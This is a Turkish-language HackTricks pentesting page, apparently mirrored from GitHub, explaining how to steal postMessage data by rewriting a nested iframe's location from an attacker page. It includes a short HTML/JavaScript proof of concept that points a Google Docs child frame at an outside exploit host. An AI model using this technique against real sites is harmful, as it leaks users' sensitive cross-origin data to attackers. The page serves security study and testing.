Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 06:30:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
Translator workflow 6cb783ece2 Translated to Turkish
2024-02-10 18:14:16 +00:00

3.8 KiB
Raw Blame History

Postmessage'ı çalarak iframe konumunu değiştirme

AWS hackleme becerilerini sıfırdan ileri seviyeye öğrenmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ya katılın!

Çocuk iframe'lerin konumunu değiştirme

Bu yazıda belirtildiği gibi, başka bir iframe içeren X-Frame-Header olmayan bir web sayfasını iframe'leyebilirseniz, o çocuk iframe'in konumunu değiştirebilirsiniz.

Örneğin, abc.com'un efg.com'u iframe olarak içerdiği ve abc.com'un X-Frame başlığı olmadığı durumda, frames.location kullanarak efg.com'u evil.com'a cross origin olarak değiştirebilirim.

Bu özellikle postMessages'larda kullanışlıdır çünkü bir sayfa, windowRef.postmessage("","*") gibi bir wildcard kullanarak hassas verileri gönderiyorsa, ilgili iframe'in (çocuk veya ebeveyn) konumunu bir saldırganın kontrol ettiği bir konuma değiştirerek ve o verileri çalabilirsiniz.

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);

function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>
AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!